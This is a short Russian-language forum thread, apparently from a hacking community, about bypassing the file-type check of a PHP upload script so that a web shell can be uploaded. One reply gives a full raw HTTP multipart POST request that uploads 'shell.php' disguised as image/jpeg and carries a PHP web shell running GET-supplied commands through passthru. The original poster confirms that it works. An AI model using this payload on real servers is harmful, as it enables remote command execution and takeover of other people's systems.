не актуально

Эм... Послать POST-запрос, но в передаваемых данных указать image/gif.

можешь небольшой пример привести?

можешь небольшой пример привести?
То что ты дал - это не рабочий скрипт.Если быть точнее,он рабочий,если он куда то инклудиться,где и обозначаються фигурируемые там переменные.Если же нет,то если на сервере register_globals = on, то просто задай переменным нужное значение,и золей шелл таким образом.Но мне чтото подсказывает,что это только часть кода.

Хоть это и часть кода, он прекрасно заливает файлы (register_globals - ON, включены).
Если добавить ?d=/ПОЛНЫЙ ПУТЬ К ДИРЕКТОРИИ ДЛЯ ЗАЛИВКИ ФАЙЛА в запросе к нему. Но вот именно обойти тип файла для заливки не могу. Попробуйте у себя его запустить

можешь небольшой пример привести?
Если расширение не проверяется, то можно заюзать что-нибудь типа такого запроса

POST http://127.0.0.1/upload/ HTTP/1.1
Host: localhost
Referer: http://127.0.0.1/index.php
Cookie: PHPSESSID=$session_id
Content-Length: 1024
Content-Type: multipart/form-data; boundary="6G+f"

--6G+f
Content-Disposition: form-data; name="MAX_FILE_SIZE"

100000
--6G+f
Content-Disposition: form-data; name="uploaded"; filename="shell.php"
Content-Type: image/jpeg

<?php
if (isset ($_GET['id']) && !empty ($_GET['id']))
passthru ($_GET['id']);
else
echo "Empty";
?>
--6G+f
Content-Disposition: form-data; name="Upload"

Upload
--6G+f--

Йухуу, есть такое дело :)
Спасибо, krypt3r